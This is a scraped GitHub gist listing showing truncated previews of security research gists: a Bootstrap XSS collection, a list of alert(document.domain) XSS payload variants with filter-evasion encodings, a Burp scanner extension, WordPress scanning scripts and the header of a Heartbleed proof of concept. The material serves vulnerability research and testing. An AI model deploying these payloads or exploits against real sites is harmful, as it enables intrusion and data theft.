Skip to content

Instantly share code, notes, and snippets.

View erwanlr's full-sized avatar

Erwan erwanlr

228 followers · 3 following
View GitHub Profile
@random-robbie
random-robbie / grab_plugins.py
Created April 1, 2020 10:49
Grab all Plugins for drupal via drupal gitlab.
import requests
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
http_proxy = "http://192.168.1.130:8085"
proxyDict = {
"http" : http_proxy,
"https" : http_proxy,
@BlackFan
BlackFan / Bootstrap_XSS.md
Last active October 21, 2025 08:24
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

@tomnomnom
tomnomnom / alert.js
Last active October 27, 2025 04:03
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@ethicalhack3r
ethicalhack3r / wp_php_object_injection.rb
Last active August 16, 2024 01:42
Burp Suite Extension to detect PHP Object Injection in WordPress Plugins (read the code comments for additional info)
java_import 'burp.IBurpExtender'
java_import 'burp.IScannerCheck'
java_import 'burp.IScanIssue'
require 'java'
java_import 'java.util.Arrays'
java_import 'java.util.ArrayList'
#
# You will need to download JRuby's Complete.jar file from http://jruby.org/download and configure Burp Extender with its path.
@mhmdiaa
mhmdiaa / waybackurls.py
Last active October 29, 2025 13:09
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@cure53
cure53 / wordpress2.md
Last active January 8, 2021 17:55
WordPress SOME bug in plupload.flash.swf
@cure53
cure53 / wordpress.md
Last active February 1, 2023 22:47
WordPress Flash XSS in flashmediaelement.swf
@atcuno
atcuno / gist:3425484ac5cce5298932
Last active October 24, 2025 08:55
HowTo: Privacy & Security Conscious Browsing

The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.

I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.

Table of Contents

@Neo23x0
Neo23x0 / wpwatcher.py
Last active November 26, 2022 15:42
Wordpress Watcher - WPScan Vulnerabilty Scan on Wordpress Sites and Reporting
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
# -*- coding: utf-8 -*-
#
# Wordpress Watcher
# Automating WPscan to scan and report vulnerable Wordpress sites
# Florian Roth
# v0.1
# March 2015
#
@takeshixx
takeshixx / hb-test.py
Last active September 8, 2025 01:16
OpenSSL heartbeat PoC with STARTTLS support.
#!/usr/bin/env python2
"""
Author: takeshix <[email protected]>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser